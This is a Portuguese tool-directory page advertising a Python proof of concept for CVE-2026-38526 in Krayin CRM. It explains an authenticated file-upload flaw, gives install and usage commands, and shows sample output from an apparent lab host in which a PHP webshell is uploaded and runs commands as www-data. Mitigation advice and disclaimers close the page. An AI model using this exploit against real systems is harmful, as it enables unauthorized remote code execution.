Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mrdark-ops/cve-2026-38526
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebCTFTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubmrdark-ops/cve-2026-38526

CVE-2026-38526

PoC em Python que explora a CVE-2026-38526 no Krayin CRM <= 2.2.x: autentica, faz upload de um webshell PHP via /admin/tinymce/upload e executa comandos remotamente.

Ver Repositório
há 2 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-38526 — Krayin CRM ≤ 2.2.x RCE Autenticado

⚠️ Aviso legal: este código é fornecido apenas para fins educativos e para testes autorizados (CTF, bug bounty, laboratório privado). O autor não é responsável por qualquer uso ilegal.

Descrição

Krayin CRM (Webkul) ≤ 2.2.x expõe o endpoint /admin/tinymce/upload que permite a um usuário autenticado (mesmo com privilégios baixos) enviar arquivos sem validação de extensão. O arquivo é então servido a partir da pasta storage/, permitindo a execução arbitrária de código PHP.

  • Tipo: Upload Arbitrário de Arquivo → RCE
  • CVSS: 9.9 (Crítico)
  • Autenticação necessária: Sim (qualquer conta válida)

Instalação

git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt

Uso

python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'

Opções:

OpçãoDescrição
-t, --targetURL raiz do alvo
-u, --userEmail da conta Krayin
-p, --passwordSenha
-c, --commandComando a executar (padrão: id)
--login-pathCaminho de login (padrão: /admin/login)
--upload-pathCaminho de upload (padrão: /admin/tinymce/upload)
--timeoutTimeout HTTP (padrão: 15)

Exemplo

$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
    -u [email protected] -p 'N27xh!!2ucY04' -c 'id'

[*] Recuperação do token CSRF em http://billing.nexus.htb/admin/login
[*] Envio do formulário de login
[+] Autenticação bem-sucedida
[*] Upload de x8f2k1ab.php via http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell acessível: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Execução: id

============================================================
[+] Comando: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

Mitigação

  • Atualizar o Krayin CRM para a versão corrigida.
  • Restringir a extensão dos arquivos enviados (whitelist).
  • Proibir a execução de PHP nas pastas storage/ e uploads/.
  • Aplicar o princípio do menor privilégio nas contas do CRM.

Disclaimer

Este projeto é publicado para fins de pesquisa em segurança. Qualquer uso contra sistemas sem autorização prévia por escrito é ilegal e estritamente proibido.

Baixar ferramenta